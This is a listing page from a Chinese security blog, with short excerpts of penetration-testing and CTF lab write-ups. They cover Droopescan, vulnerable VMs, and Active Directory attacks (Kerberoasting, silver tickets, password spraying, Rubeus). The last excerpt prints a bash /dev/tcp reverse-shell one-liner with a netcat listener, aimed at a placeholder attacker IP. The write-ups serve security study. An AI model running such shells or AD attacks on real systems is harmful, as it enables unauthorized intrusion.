最新发布第7页
Droopescan-白鸢的笔记

Droopescan

Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题。安装:使用pip安装会非常容易:apt-get i...
VulnOS v2靶机的两种方法渗透测试详解-白鸢的笔记

VulnOS v2靶机的两种方法渗透测试详解

实验环境攻击者 Kali 192.168.0.103受害者 VulnOS v2 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.101 收集受害者服务详情nmap -sV -A 192.168.0...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0809
Pelican-白鸢的笔记

Pelican

简介point 20PelicanDifficulty INTERMEDIATErated by community INTERMEDIAT Let's hope to see one at the zoo. 实验环境攻击者 Kali 192.168.45.209受害者 IP 192.168.181.98  Linux 1. ...
Magic  Magic Bytes Head文件上传绕过 mysqldump-白鸢的笔记

Magic Magic Bytes Head文件上传绕过 mysqldump

简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07913
Objective 18-白鸢的笔记

Objective 18

任务• 使用 DA 访问 dollarcorp.moneycorp.local,使用域信任密钥将权限升级到企业管理员或 DA 到父域 moneycorp.local。 使用DA权限启动一个进程C:\AD\Tools\Rubeus.exe asktgt /user:svcadm...
zhyann的头像-白鸢的笔记钻石会员zhyann11个月前
0797
对 Active Directory 身份验证执行攻击1 密码喷射-白鸢的笔记

对 Active Directory 身份验证执行攻击1 密码喷射

1. 密码攻击在探索这些攻击之前,我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时,我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击,并可能向系统管...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07911
对 Active Directory 身份验证执行攻击4 Silver Tickets-白鸢的笔记

对 Active Directory 身份验证执行攻击4 Silver Tickets

在对 Active Directory 身份验证执行攻击3中,我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步,伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理,在服务帐户...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07911
Objective 14-白鸢的笔记

Objective 14

任务使用kerberoast攻击 破解密码找到SQL Server 服务账户 找出以用户帐户运行的服务以及以机器帐户运行的服务. C:\AD\Tools\PowerView.ps1Get-DomainUser -SPN 使用Rubeus得到svcadmin accou...
zhyann的头像-白鸢的笔记钻石会员zhyann11个月前
0799
Mercy V2 knock过滤端口解决 Tomcat用户名密码文件-白鸢的笔记

Mercy V2 knock过滤端口解决 Tomcat用户名密码文件

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0786
交互式shell和稳定shell的建立-白鸢的笔记

交互式shell和稳定shell的建立

1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07814